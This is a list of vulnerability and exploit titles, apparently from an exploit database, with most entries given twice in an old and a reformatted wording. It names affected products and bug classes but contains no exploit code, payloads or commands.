Mini Web Calendar 1.2 (File Disclosure/XSS) Multiple Vulnerabilities
Mini Web Calendar 1.2 - (File Disclosure/XSS) Multiple Vulnerabilities

zeeproperty 1.0 (upload/XSS) Multiple Vulnerabilities
zeeproperty 1.0 - (upload/XSS) Multiple Vulnerabilities

Openfire Server <= 3.6.0a (Auth Bypass/SQL/XSS) Multiple Vulnerabilities
Openfire Server <= 3.6.0a - (Auth Bypass/SQL/XSS) Multiple Vulnerabilities

AJSquare Free Polling Script (DB) Multiple Vulnerabilities
AJSquare Free Polling Script - (DB) Multiple Vulnerabilities

turnkeyforms Web Hosting Directory Multiple Vulnerabilities
turnkeyforms Web Hosting Directory - Multiple Vulnerabilities

GS Real Estate Portal US/International Module Multiple Vulnerabilities
GS Real Estate Portal US/International Module - Multiple Vulnerabilities

bandwebsite 1.5 (SQL/XSS) Multiple Vulnerabilities
bandwebsite 1.5 - (SQL/XSS) Multiple Vulnerabilities
chipmunk topsites (auth bypass/XSS) Multiple Vulnerabilities
clean CMS 1.5 (blind SQL Injection/XSS) Multiple Vulnerabilities
chipmunk topsites - (auth bypass/XSS) Multiple Vulnerabilities
clean CMS 1.5 - (blind SQL Injection/XSS) Multiple Vulnerabilities

Ocean12 Contact Manager Pro (SQL/XSS/DDV) Multiple Vulnerabilities
Ocean12 Contact Manager Pro - (SQL/XSS/DDV) Multiple Vulnerabilities

comersus asp shopping cart (dd/XSS) Multiple Vulnerabilities
comersus asp shopping cart - (DD/XSS) Multiple Vulnerabilities

minimal ablog 0.4 (SQL/fu/bypass) Multiple Vulnerabilities
minimal ablog 0.4 - (SQL/fu/bypass) Multiple Vulnerabilities

Ocean12 Mailing List Manager Gold (DD/SQL/XSS) Vulnerabilities
Ocean12 Mailing List Manager Gold - (DD/SQL/XSS) Vulnerabilities

wbstreet 1.0 (SQL/dd) Multiple Vulnerabilities
wbstreet 1.0 - (SQL/DD) Multiple Vulnerabilities

template creature (SQL/dd) Multiple Vulnerabilities
template creature - (SQL/DD) Multiple Vulnerabilities

merlix educate servert (bypass/dd) Multiple Vulnerabilities
merlix educate servert - (bypass/DD) Multiple Vulnerabilities
nightfall personal diary 1.0 - (XSS/dd) Multiple Vulnerabilities
Merlix Teamworx Server (DD/Bypass) Multiple Remote Vulnerabilities
nightfall personal diary 1.0 - (XSS/DD) Multiple Vulnerabilities
Merlix Teamworx Server - (DD/Bypass) Multiple Remote Vulnerabilities

asp autodealer (SQL/dd) Multiple Vulnerabilities
asp autodealer - (SQL/DD) Multiple Vulnerabilities

aspmanage banners (rfu/dd) Multiple Vulnerabilities
aspmanage banners - (RFU/DD) Multiple Vulnerabilities

asp talk (SQL/css) Multiple Vulnerabilities
asp talk - (SQL/css) Multiple Vulnerabilities

siu guarani Multiple Vulnerabilities
siu guarani - Multiple Vulnerabilities

webcaf <= 1.4 - (LFI/rce) Multiple Vulnerabilities
webcaf <= 1.4 - (LFI/RCE) Multiple Vulnerabilities

postecards (SQL/dd) Multiple Vulnerabilities
postecards - (SQL/DD) Multiple Vulnerabilities

living Local 1.1 - (XSS-rfu) Multiple Vulnerabilities
living Local 1.1 - (XSS/rfu) Multiple Vulnerabilities

cf shopkart 5.2.2 (SQL/dd) Multiple Vulnerabilities
cf shopkart 5.2.2 - (SQL/DD) Multiple Vulnerabilities

the net guys aspired2blog (SQL/dd) Multiple Vulnerabilities
the net guys aspired2blog - (SQL/dd) Multiple Vulnerabilities

joomla live chat (SQL/proxy) Multiple Vulnerabilities
joomla live chat - (SQL/proxy) Multiple Vulnerabilities

isweb CMS 3.0 (SQL/XSS) Multiple Vulnerabilities
isweb CMS 3.0 - (SQL/XSS) Multiple Vulnerabilities
clickandemail (SQL/XSS) Multiple Vulnerabilities
click&rank (SQL/XSS) Multiple Vulnerabilities
clickandemail - (SQL/XSS) Multiple Vulnerabilities
click&rank - (SQL/XSS) Multiple Vulnerabilities
Liberum Help Desk 0.97.3 (SQL/DD) Remote Vulnerabilities
Zelta E Store (RFU/BYPASS/R-SQL/B-SQL) Multiple Vulnerabilities
Liberum Help Desk 0.97.3 - (SQL/DD) Remote Vulnerabilities
Zelta E Store - (RFU/BYPASS/R-SQL/B-SQL) Multiple Vulnerabilities

2532/gigs 1.2.2 - stable Multiple Vulnerabilities
2532/gigs 1.2.2 stable - Multiple Vulnerabilities

constructr CMS <= 3.02.5 stable Multiple Vulnerabilities
constructr CMS <= 3.02.5 stable - Multiple Vulnerabilities

chicomas <= 2.0.4 (DB Backup/DD/XSS) Multiple Vulnerabilities
chicomas <= 2.0.4 - (DB Backup/DD/XSS) Multiple Vulnerabilities

yourplace <= 1.0.2 - Multiple Vulnerabilities + rce Exploit
yourplace <= 1.0.2 - Multiple Vulnerabilities + RCE Exploit

doop CMS <= 1.4.0b (CSRF/upload shell) Multiple Vulnerabilities
doop CMS <= 1.4.0b - (CSRF/upload shell) Multiple Vulnerabilities

Nokia S60 SMS/Mms (Curse of Silence) Denial of Service Vulnerability
Nokia S60 SMS/MMS (Curse of Silence) - Denial of Service Vulnerability

Seo4SMF for SMF forums Multiple Vulnerabilities
Seo4SMF for SMF forums - Multiple Vulnerabilities

mkportal <= 1.2.1 () Multiple Vulnerabilities
mkportal <= 1.2.1 - Multiple Vulnerabilities
rankem (dd/XSS/cm) Multiple Vulnerabilities
blogit! (SQL/dd/XSS) Multiple Vulnerabilities
rankem - (DD/XSS/cm) Multiple Vulnerabilities
blogit! - (SQL/DD/XSS) Multiple Vulnerabilities

E-ShopSystem Auth Bypass / SQL Injection Multiple Vulnerabilities
E-ShopSystem - (Auth Bypass / SQL Injection) Multiple Vulnerabilities

Motorola Wimax modem CPEi300 (FD/XSS) Multiple Vulnerabilities
Motorola Wimax modem CPEi300 - (FD/XSS) Multiple Vulnerabilities

navicopa webserver 3.0.1 (bof/sd) Multiple Vulnerabilities
navicopa webserver 3.0.1 - (bof/sd) Multiple Vulnerabilities
Power System Of Article Management 3.0 - (DD/XSS) Vulnerabilities
team 1.x - (dd/XSS) Multiple Vulnerabilities
Power System Of Article Management 3.0 - (DD/XSS) Multiple Vulnerabilities
team 1.x - (DD/XSS) Multiple Vulnerabilities

gr blog 1.1.4 (upload/bypass) Multiple Vulnerabilities
gr blog 1.1.4 - (upload/bypass) Multiple Vulnerabilities

zeroboard4 pl8 (07.12.17) Multiple Vulnerabilities
zeroboard4 pl8 (07.12.17) - Multiple Vulnerabilities

SilverNews 2.04 (Auth Bypass/LFI/RCE) Multiple Vulnerabilities
SilverNews 2.04 - (Auth Bypass/LFI/RCE) Multiple Vulnerabilities

w3bcms <= 3.5.0 - Multiple Vulnerabilities Exploit
w3bcms <= 3.5.0 - Multiple Vulnerabilities

powermovielist 0.14b (SQL/XSS) Multiple Vulnerabilities
powermovielist 0.14b - (SQL/XSS) Multiple Vulnerabilities
ritsblog 0.4.2 (ab/XSS) Multiple Vulnerabilities
Zabbix 1.6.2 Frontend Multiple Vulnerabilities
blindblog 1.3.1 (SQL/ab/LFI) Multiple Vulnerabilities
ritsblog 0.4.2 - (ab/XSS) Multiple Vulnerabilities
Zabbix 1.6.2 - Frontend - Multiple Vulnerabilities
blindblog 1.3.1 - (SQL/ab/LFI) Multiple Vulnerabilities

phpCommunity 2.1.8 (SQL/DT/XSS) Multiple Vulnerabilities
phpCommunity 2.1.8 - (SQL/DT/XSS) Multiple Vulnerabilities

Telnet-Ftp Service Server 1.x - Multiple Vulnerabilities (Post Auth)
Telnet-Ftp Service Server 1.x - (Post Auth) Multiple Vulnerabilities

Femitter FTP Server 1.x - Multiple Vulnerabilities (post auth)
Femitter FTP Server 1.x - (Post Auth) Multiple Vulnerabilities

Diskos CMS Manager (SQL/DB/Auth Bypass) Multiple Vulnerabilities
Diskos CMS Manager - (SQL/DB/Auth Bypass) Multiple Vulnerabilities

Linux Kernel 2.6 - UDEV Local Privilege Escalation Exploit
Linux Kernel 2.6 (Debian / Ubuntu / Gentoo) - UDEV Local Privilege Escalation Exploit

flatnux 2009-03-27 (upload/id) Multiple Vulnerabilities
flatnux 2009-03-27 - (upload/id) Multiple Vulnerabilities

fungamez rc1 (ab/LFI) Multiple Vulnerabilities
fungamez rc1 - (ab/LFI) Multiple Vulnerabilities

mixedcms 1.0b (LFI/su/ab/fd) Multiple Vulnerabilities
mixedcms 1.0b - (LFI/su/ab/fd) Multiple Vulnerabilities

fowlcms 1.1 (ab/LFI/su) Multiple Vulnerabilities
fowlcms 1.1 - (ab/LFI/su) Multiple Vulnerabilities

dwebpro 6.8.26 (dt/fd) Multiple Vulnerabilities
dwebpro 6.8.26 - (dt/fd) Multiple Vulnerabilities

Linux Kernel 2.6.x - SCTP FWD Memory Corruption Remote Exploit
Linux Kernel 2.6.x (<= 2.6.20 / <= 2.6.24 / <= 2.6.27_7-10) (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1)  - SCTP FWD Memory Corruption Remote Exploit

Linux Kernel 2.6 UDEV < 141 - Local Privilege Escalation Exploit
Linux Kernel 2.6 UDEV < 141 (Gentoo / Ubuntu 8.10/9.04) - Local Privilege Escalation Exploit

leap CMS 0.1.4 (SQL/XSS/su) Multiple Vulnerabilities
leap CMS 0.1.4 - (SQL/XSS/su) Multiple Vulnerabilities

tematres 1.0.3 (auth bypass/SQL/XSS) Multiple Vulnerabilities
tematres 1.0.3 - (auth bypass/SQL/XSS) Multiple Vulnerabilities

Linux Kernel 2.6.x - ptrace_attach Local Privilege Escalation Exploit
Linux Kernel 2.6.x (Gentoo 2.6.29rc1) - ptrace_attach Local Privilege Escalation Exploit
2daybiz business community script Multiple Vulnerabilities
Easy Scripts Answer and Question Script Multiple Vulnerabilities
2daybiz business community script - Multiple Vulnerabilities
Easy Scripts Answer and Question Script - Multiple Vulnerabilities
my-colex 1.4.2 (ab/XSS/SQL) Multiple Vulnerabilities
my-gesuad 0.9.14 (ab/SQL/XSS) Multiple Vulnerabilities
my-colex 1.4.2 - (ab/XSS/SQL) Multiple Vulnerabilities
my-gesuad 0.9.14 - (ab/SQL/XSS) Multiple Vulnerabilities

vidshare pro (SQL/XSS) Multiple Vulnerabilities
vidshare pro - (SQL/XSS) Multiple Vulnerabilities

Mac OS X - Java applet Remote Deserialization Remote PoC (updated)
Mac OS X - Java applet Remote Deserialization Remote PoC (Updated)

asp inline corporate calendar (SQL/XSS) Multiple Vulnerabilities
asp inline corporate calendar - (SQL/XSS) Multiple Vulnerabilities

minitwitter 0.3-beta (SQL/XSS) Multiple Vulnerabilities
minitwitter 0.3-beta - (SQL/XSS) Multiple Vulnerabilities

elitecms 1.01 (SQL/XSS) Multiple Vulnerabilities
elitecms 1.01 - (SQL/XSS) Multiple Vulnerabilities

flashlight free edition (LFI/SQL) Multiple Vulnerabilities
flashlight free edition - (LFI/SQL) Multiple Vulnerabilities

propertymax pro free (SQL/XSS) Multiple Vulnerabilities
propertymax pro free - (SQL/XSS) Multiple Vulnerabilities

podcast generator <= 1.2 - globals[] Multiple Vulnerabilities
podcast generator <= 1.2 - globals[] - Multiple Vulnerabilities

kloxo 5.75 (24 issues) Multiple Vulnerabilities
kloxo 5.75 - (24 issues) Multiple Vulnerabilities

virtue news (SQL/XSS) Multiple Vulnerabilities
virtue news - (SQL/XSS) Multiple Vulnerabilities

mrcgiguy the ticket system 2.0 php Multiple Vulnerabilities
mrcgiguy the ticket system 2.0 php - Multiple Vulnerabilities

mrcgiguy freeticket (ch/SQL) Multiple Vulnerabilities
mrcgiguy freeticket - (ch/SQL) Multiple Vulnerabilities

impleo music collection 2.0 (SQL/XSS) Multiple Vulnerabilities
impleo music collection 2.0 - (SQL/XSS) Multiple Vulnerabilities

kasseler CMS (fd/XSS) Multiple Vulnerabilities
kasseler CMS - (fd/XSS) Multiple Vulnerabilities

tribiq CMS 5.0.12c (XSS/LFI) Multiple Vulnerabilities
tribiq CMS 5.0.12c - (XSS/LFI) Multiple Vulnerabilities

Virtue Online Test Generator (AB/SQL/XSS) Multiple Vulnerabilities
Virtue Online Test Generator - (AB/SQL/XSS) Multiple Vulnerabilities

Linux Kernel <= 2.6.28.3 - set_selection() UTF-8 Off By One Local Exploit (x86-64)
Linux Kernel <= 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 & Fedora Core 10) (x86-64) - set_selection() UTF-8 Off By One Local Exploit

Siteframe CMS 3.2.x SQL Injection/phpinfo() Multiple Vulnerabilities
Siteframe CMS 3.2.x - (SQL Injection/phpinfo()) Multiple Vulnerabilities

citrix xencenterweb - (XSS/SQL/rce) Multiple Vulnerabilities
citrix xencenterweb - (XSS/SQL/RCE) Multiple Vulnerabilities

FreeBSD 6/8 (ata device) Local Denial of Service Exploit
FreeBSD 6/8 - (ata device) Local Denial of Service Exploit

good/bad vote (XSS/LFI) Multiple Vulnerabilities
good/bad vote - (XSS/LFI) Multiple Vulnerabilities

Linux Kernel 2.6.30 <= 2.6.30.1 / SELinux / RHEL5 - Test Kernel Local Root Exploit (0day)
Linux Kernel 2.6.30 <= 2.6.30.1 / SELinux (RHEL5) - Kernel Local Root Exploit (0day)

mcshoutbox 1.1 (SQL/XSS/shell) Multiple Vulnerabilities
mcshoutbox 1.1 - (SQL/XSS/shell) Multiple Vulnerabilities

DD-WRT (httpd service) Remote Command Execution Vulnerability
DD-WRT - (httpd service) Remote Command Execution Vulnerability

tenrok 1.1.0 (udd/rce) Multiple Vulnerabilities
tenrok 1.1.0 - (udd/RCE) Multiple Vulnerabilities

logoshows bbs 2.0 (dd/ich) Multiple Vulnerabilities
logoshows bbs 2.0 - (DD/ich) Multiple Vulnerabilities

Linux Kernel 2.x - sock_sendpage() Local Ring0 Root Exploit (1)
Linux Kernel 2.x (Redhat) - sock_sendpage() Ring0 Local Root Exploit (1)

Linux Kernel 2.4 / 2.6 - sock_sendpage() ring0 Root Exploit (1)
Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - sock_sendpage() ring0 Root Exploit (1)

Linux Kernel <= 2.6.31-rc7 - AF_LLC getsockname 5-Byte Stack Disclosure
Linux Kernel <= 2.6.31-rc7 - AF_LLC getsockname 5-Byte Stack Disclosure Proof of Concept

Linux Kernel 2.6 < 2.6.19 - (32-bit) ip_append_data() ring0 Root Exploit
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6) - (32-bit) ip_append_data() ring0 Root Exploit

Linux Kernel 2.4 / 2.6 - sock_sendpage() Local Root Exploit (PPC Edition)
Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SUSE 10 SP2/11 / Ubuntu 8.10) - sock_sendpage() Local Root (PPC)
Linux Kernel < 2.6.19 - udp_sendmsg Local Root Exploit (x86/x64)
Linux Kernel < 2.6.19 - udp_sendmsg Local Root Exploit
Linux Kernel < 2.6.19 (x86/x64) - udp_sendmsg Local Root Exploit
Linux Kernel < 2.6.19 (Debian 4) - udp_sendmsg Local Root Exploit

Linux Kernel 2.4 / 2.6 - sock_sendpage() Local Root Exploit (2)
Linux Kernel 2.4 / 2.6 (Fedora 11) - sock_sendpage() Local Root Exploit (2)

Joomla Hotel Booking System - XSS/SQL Injection Multiple Vulnerabilities
Joomla Hotel Booking System - (XSS/SQL Injection) Multiple Vulnerabilities

Alteon OS BBI (Nortell) - Multiple Vulnerabilities XSS and CSRF
Alteon OS BBI (Nortell) -  (XSS and CSR) Multiple Vulnerabilities
Linux Kernel - 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty
Linux Kernel - 'pipe.c' Local Privilege Escalation Vulnerability
Linux Kernel 2.6.x - 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty
Linux Kernel <= 2.6.32 - 'pipe.c' Local Privilege Escalation Vulnerability

Linux Kernel - 'unix_stream_connect()' Local Denial of Service Vulnerability
Linux Kernel <=  2.6.31.4 - 'unix_stream_connect()' Local Denial of Service Vulnerability

Unreal Tournament 2004 - _Secure_ Overflow
Unreal Tournament 2004 - 'Secure' Overflow

VMWare Fusion <= 2.0.5 - vmx86 kext Local kernel Root Exploit
VMWare Fusion <= 2.0.5 - vmx86 kext Kernel Local Root Exploit

PHP < 5.3.1 - _multipart/form-data_ Denial of Service Exploit (Python)
PHP < 5.3.1 - 'multipart/form-data' Denial of Service Exploit (Python)

sugar crm 5.5.0.rc2 and 5.2.0j Multiple Vulnerabilities
sugar crm 5.5.0.rc2 and 5.2.0j - Multiple Vulnerabilities

Huawei MT882 Modem/Router Multiple Vulnerabilities
Huawei MT882 Modem/Router - Multiple Vulnerabilities

DigitalHive Multiple Vulnerabilities
DigitalHive - Multiple Vulnerabilities

zabbix server Multiple Vulnerabilities
zabbix server - Multiple Vulnerabilities

Ez Faq Maker Multiple Vulnerabilities
Ez Faq Maker - Multiple Vulnerabilities

Ez Blog 1.0 - XSS/CSRF Multiple Vulnerabilities
Ez Blog 1.0 - (XSS/CSRF) Multiple Vulnerabilities

Recipe Script 5.0 - Shell Upload/CSRF/XSS Multiple Vulnerabilities
Recipe Script 5.0 - (Shell Upload/CSRF/XSS) Multiple Vulnerabilities

eUploader PRO 3.1.1 - CSRF/XSS Multiple Vulnerabilities
eUploader PRO 3.1.1 - (CSRF/XSS) Multiple Vulnerabilities

Horde 3.3.5 - _PHP_SELF_ XSS Vulnerability
Horde 3.3.5 - 'PHP_SELF' XSS Vulnerability

Lizard Cart Upload Shell Vulnerability
Lizard Cart - Upload Shell Vulnerability

Mega Upload Upload Shell Vulnerability
Mega Upload 1.45 - Upload Shell Vulnerability
MyCart shopping cart Upload Shell Vulnerability
oscommerce <= 2.2rc2a Bypass/Create and Download Backup Vulnerability
MyCart shopping cart - Upload Shell Vulnerability
osCommerce <= 2.2rc2a - Bypass/Create and Download Backup Vulnerability

gallery_show.asp GID suffer from Blind SQL Injection Vulnerability
gallery_show.asp - GID Blind SQL Injection Vulnerability

Mini-NUKE 2.3 - Freehost Multiple Vulnerabilities
Mini-NUKE 2.3 Freehost - Multiple Vulnerabilities

VirtualDJ Trial 6.0.6 - _New Year Edition_ - (.m3u) Exploit (0day)
VirtualDJ Trial 6.0.6 - 'New Year Edition' - (.m3u) Exploit (0day)

PHPDirector Game Edition 0.1 - Multiple Vulnerabilities (LFI/SQLi/XSS)
PHPDirector Game Edition 0.1 -  (LFI/SQLi/XSS) Multiple Vulnerabilities

Docebo 3.6.0.2 (stable) Local File Inclusion
Docebo 3.6.0.2 (stable) - Local File Inclusion
CLONEBID B2B Marketplace Multiple Vulnerabilities
ITechSctipts Alibaba Clone Multiple Vulnerabilities
CLONEBID B2B Marketplace - Multiple Vulnerabilities
ITechSctipts Alibaba Clone - Multiple Vulnerabilities

ManageEngine OpUtils 5 - _Login.DO_ SQL Injection Vulnerability
ManageEngine OpUtils 5 - 'Login.DO' SQL Injection Vulnerability

CMS by MyWorks Multiple Vulnerabilities
CMS by MyWorks - Multiple Vulnerabilities

DZ Auktionshaus _V4.rgo_ (id) news.php - SQL Injection Vulnerability
DZ Auktionshaus 'V4.rgo' (id) news.php - SQL Injection Vulnerability

PhpCityPortal Multiple Vulnerabilities
PhpCityPortal - Multiple Vulnerabilities

Joomla Component com_ckforms Multiple Vulnerabilities
Joomla Component com_ckforms - Multiple Vulnerabilities

Joomla Component com_vxdate Multiple Vulnerabilities
Joomla Component com_vxdate - Multiple Vulnerabilities

Adult Video Site Script Multiple Vulnerabilities
Adult Video Site Script - Multiple Vulnerabilities

iOS Safari - Bad _VML_ Remote DoS
iOS Safari - Bad 'VML' Remote DoS

Linux Kernel <= 2.6.34-rc3 ReiserFS xattr - Privilege Escalation
Linux Kernel <= 2.6.34-rc3 ReiserFS xattr (Redhat/Ubuntu 9.10) - Privilege Escalation

vBulletin _Cyb - Advanced Forum Statistics_ DoS
vBulletin 'Cyb - Advanced Forum Statistics' DoS

dl_stats Multiple Vulnerabilities
dl_stats - Multiple Vulnerabilities

avtech software (avc781viewer.dll) ActiveX Multiple Vulnerabilities
avtech software (avc781viewer.dll) ActiveX - Multiple Vulnerabilities

lanewsfactory Multiple Vulnerabilities
lanewsfactory - Multiple Vulnerabilities

MacOS X 10.6 HFS File System Attack (Denial of Service)
MacOS X 10.6 - HFS File System Attack (Denial of Service)

WFTPD Server 3.30 - Multiple Vulnerabilities (0day)
WFTPD Server 3.30 - (0day) Multiple Vulnerabilities

CompactCMS 1.4.0 (tiny_mce) Remote File Upload
CompactCMS 1.4.0 (tiny_mce) - Remote File Upload

Tainos Multiple Vulnerabilities
Tainos - Multiple Vulnerabilities

Joomla Component com_event Multiple Vulnerabilities
Joomla Component com_event - Multiple Vulnerabilities

B-Hind CMS (tiny_mce) Remote File Upload
B-Hind CMS (tiny_mce) - Remote File Upload

ComponentOne VSFlexGrid 7 & 8 - _Archive()_ method Remote Buffer Overflow Exploit
ComponentOne VSFlexGrid 7 & 8 - 'Archive()' method Remote Buffer Overflow Exploit

(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - _PORT_ Command Remote DoS
(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - 'PORT' Command Remote DoS

Blaze Apps Multiple Vulnerabilities
Blaze Apps - Multiple Vulnerabilities

Joomla Component My Car Multiple Vulnerabilities
Joomla Component My Car - Multiple Vulnerabilities

Marketing Web Design Multiple Vulnerabilities
Marketing Web Design - Multiple Vulnerabilities

Aim Web Design Multiple Vulnerabilities
Aim Web Design - Multiple Vulnerabilities

Zeeways Script Multiple Vulnerabilities
Zeeways Script - Multiple Vulnerabilities

QuickTalk 1.2 - Multiple Vulnerabilities (Source Code Disclosure)
QuickTalk 1.2 -  (Source Code Disclosure) Multiple Vulnerabilities
Joomla Component ChronoConnectivity
Joomla Component ChronoForms (com_chronocontact)
Joomla Component ChronoConnectivity (com_chronoconnectivity) - Blind SQL Injection Vulnerability
Joomla Component ChronoForms (com_chronocontact) - Blind SQL Injection Vulnerability

Simple Posting System Multiple Vulnerabilities
Simple Posting System - Multiple Vulnerabilities

Joomla Component com_djartgallery Multiple Vulnerabilities
Joomla Component com_djartgallery - Multiple Vulnerabilities

Miniweb 2.0 Business Portal and Social Networking Platform SQL Injection
Miniweb 2.0 Business Portal and Social Networking Platform - SQL Injection

E-PHP B2B Marketplace Multiple Vulnerabilities
E-PHP B2B Marketplace - Multiple Vulnerabilities

DaLogin Multiple Vulnerabilities
DaLogin - Multiple Vulnerabilities

Novell iManager Multiple Vulnerabilities
Novell iManager - Multiple Vulnerabilities
2DayBiz Video Community portal - _user-profile.php_ SQL Injection Vulnerability
2DayBiz Real Estate Portal - _viewpropertydetails.php_ SQL injection
2DayBiz Video Community portal - 'user-profile.php' SQL Injection Vulnerability
2DayBiz Real Estate Portal - 'viewpropertydetails.php' SQL injection

NO-IP.com Dynamic DNS Update Client 2.2.1 - _Request_ Insecure Encoding Algorithm
NO-IP.com Dynamic DNS Update Client 2.2.1 - 'Request' Insecure Encoding Algorithm
TCW PHP Album Multiple Vulnerabilities
Esoftpro Online Guestbook Pro Multiple Vulnerabilities
TCW PHP Album - Multiple Vulnerabilities
Esoftpro Online Guestbook Pro - Multiple Vulnerabilities

Esoftpro Online Contact Manager Multiple Vulnerabilities
Esoftpro Online Contact Manager - Multiple Vulnerabilities

Joomla Component Sef (com_sef) - LFI Vulnerability
Joomla Component SEF (com_sef) - Local File Inclusion Vulnerability

artforms 2.1b7.2 rc2 joomla component Multiple Vulnerabilities
artforms 2.1b7.2 rc2 joomla component - Multiple Vulnerabilities

Qt 4.6.3 - _QSslSocketBackendPrivate::transmit()_ Denial of Service
Qt 4.6.3 - 'QSslSocketBackendPrivate::transmit()' Denial of Service

Macs CMS 1.1.4 - Multiple Vulnerabilities (XSS/CSRF)
Macs CMS 1.1.4 - (XSS/CSRF) Multiple Vulnerabilities
GetSimple CMS 2.01 - Multiple Vulnerabilities (XSS/CSRF)
Ubuntu 9.10 (Karmic Koala) & 10.04 LTS (Lucid Lynx) PAM 1.1.0 MOTD - Local Root Exploit
GetSimple CMS 2.01 - (XSS/CSRF) Multiple Vulnerabilities
PAM 1.1.0 MOTD (Ubuntu 9.10/10.04) - Local Root Exploit

Joomla Component QContacts (com_qcontacts) SQL Injection Vulnerability
Joomla Component QContacts (com_qcontacts) - SQL Injection Vulnerability

Ubuntu 10.04 LTS - Lucid Lynx ftp Client 0.17-19build1 ACCT - Buffer Overflow
ftp Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow

Microsoft Windows - Win32k.sys Driver _CreateDIBPalette()_ Buffer Overflow
Microsoft Windows - Win32k.sys Driver 'CreateDIBPalette()' Buffer Overflow
Easy FTP - BoF Vulnerabilities in NLST & NLST -al & APPE & RETR & SIZE & XCWD Commands
Zendesk Multiple Vulnerabilities
Easy FTP 1.7.0.11 - BoF Vulnerabilities in NLST & NLST -al & APPE & RETR & SIZE & XCWD Commands
Zendesk - Multiple Vulnerabilities

Mediacoder 0.7.5.4710 - _Universal_ SEH Buffer Overflow Exploit
Mediacoder 0.7.5.4710 - 'Universal' SEH Buffer Overflow Exploit

Simple Forum PHP Multiple Vulnerabilities
Simple Forum PHP - Multiple Vulnerabilities

Linux Kernel < 2.6.36-rc1 CAN BCM - Privilege Escalation Exploit
Linux Kernel < 2.6.36-rc1 CAN BCM (Ubuntu 10.04 / 2.6.32-21) - Privilege Escalation Exploit

Apple QuickTime __Marshaled_pUnk_ Backdoor Param Client-Side Arbitrary Code Execution
Apple QuickTime '_Marshaled_pUnk' Backdoor Param Client-Side Arbitrary Code Execution

Adobe Acrobat Reader and Flash Player - _newclass_ invalid pointer
Adobe Acrobat Reader and Flash Player - 'newclass' invalid pointer

Shop a la Cart Multiple Vulnerabilities
Shop a la Cart - Multiple Vulnerabilities

ifnuke - Multiple Vulnerabilities (0day)
ifnuke - (0day) Multiple Vulnerabilities

dynpage <= 1.0 - Multiple Vulnerabilities (0day)
dynpage <= 1.0 - (0day) Multiple Vulnerabilities

sirang web-based d-control Multiple Vulnerabilities
sirang web-based d-control - Multiple Vulnerabilities

Microsoft Office Visio - .DXF File Stack based Overflow
Microsoft Office Visio 2002 - .DXF File Stack based Overflow

Mozilla Firefox - XSLT Sort Remote Code Execution Vulnerability
Mozilla Firefox 3.6.3 - XSLT Sort Remote Code Execution Vulnerability

Zeeways Adserver Multiple Vulnerabilities
Zeeways Adserver - Multiple Vulnerabilities

Microsoft Office Word 2007 - sprmCMajority Buffer Overflow
Microsoft Office Word 2007 SP2 - sprmCMajority Buffer Overflow

Adobe Acrobat and Reader - _pushstring_ Memory Corruption
Adobe Acrobat and Reader - 'pushstring' Memory Corruption

Linux Kernel 2.6.27 < 2.6.36 - x86_64 compat Local Root Exploit
Linux Kernel 2.6.27 < 2.6.36 (x86_64) (Redhat) - compat Local Root Exploit

Firefox Plugin Parameter EnsureCachedAttrParamArrays - Remote Code Execution
Firefox 3.6.4 - Plugin Parameter EnsureCachedAttrParamArrays - Remote Code Execution

xt:Commerce Gambio 2008 - 2010 ERROR Based SQL Injection _reviews.php_
xt:Commerce Gambio 2008 - 2010 ERROR Based SQL Injection 'reviews.php'

Java CMM readMabCurveData - Stack Overflow
Java 6.19 CMM readMabCurveData - Stack Overflow
Microsoft drm technology (msnetobj.dll) ActiveX Multiple Vulnerabilities
RarCrack 0.2 - _filename_ init() .bss PoC
Microsoft drm technology (msnetobj.dll) ActiveX - Multiple Vulnerabilities
RarCrack 0.2 - 'filename' init() .bss PoC

je guestbook 1.0 joomla component Multiple Vulnerabilities
je guestbook 1.0 joomla component - Multiple Vulnerabilities

Allpc 2.5 osCommerce SQL/XSS Multiple Vulnerabilities
Allpc 2.5 osCommerce - (SQL/XSS) Multiple Vulnerabilities

Linux Kernel < 2.6.36-rc6 - pktcdvd Kernel Memory Disclosure
Linux Kernel < 2.6.36-rc6 (Redhat/Ubuntu 10.04) - pktcdvd Kernel Memory Disclosure Proof of Concept

TradeMC E-Ticaret SQL and XSS Multiple Vulnerabilities
TradeMC E-Ticaret (SQL/XSS) Multiple Vulnerabilities

Cag CMS 0.2 - XSS & Blind SQL Injection Multiple Vulnerabilities
Cag CMS 0.2 - (XSS/Blind SQL Injection) Multiple Vulnerabilities

js calendar 1.5.1 joomla component Multiple Vulnerabilities
js calendar 1.5.1 joomla component - Multiple Vulnerabilities

Oracle Java 6 - OBJECT tag _launchjnlp_/_docbase_ Param Buffer Overflow Exploit
Oracle Java 6 - OBJECT tag 'launchjnlp'/'docbase' Param Buffer Overflow Exploit

Linux Kernel - VIDIOCSMICROCODE IOCTL Local Memory Overwrite Vulnerability
Linux Kernel <= 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite Vulnerability

Sybase Advantage Data Architect - _*.SQL_ Format Heap Oveflow
Sybase Advantage Data Architect - '*.SQL' Format Heap Oveflow

Minishare 1.5.5 - Buffer Overflow Vulnerability (users.txt)
Minishare 1.4.0 - 1.5.5 - Buffer Overflow Vulnerability (users.txt)

Linux Kernel - Stack Infoleaks Vulnerability
Linux Kernel <= 2.4.0 - Stack Infoleaks Vulnerability

Joomla Component ccBoard 1.2-RC Multiple Vulnerabilities
Joomla Component ccBoard 1.2-RC - Multiple Vulnerabilities

CLANSPHERE 2010.0 Final Multiple Vulnerabilities
CLANSPHERE 2010.0 Final - Multiple Vulnerabilities

Linux Kernel - 'setup_arg_pages()' Denial of Service Vulnerability
Linux Kernel <= 2.6.37 - 'setup_arg_pages()' Denial of Service Vulnerability

Linux Kernel - Unix Sockets Local Denial of Service
Linux Kernel <= 2.6.37 - Unix Sockets Local Denial of Service

Site2Nite Big Truck Broker _txtSiteId_ SQL Injection Vulnerability
Site2Nite Big Truck Broker - 'txtSiteId' SQL Injection Vulnerability

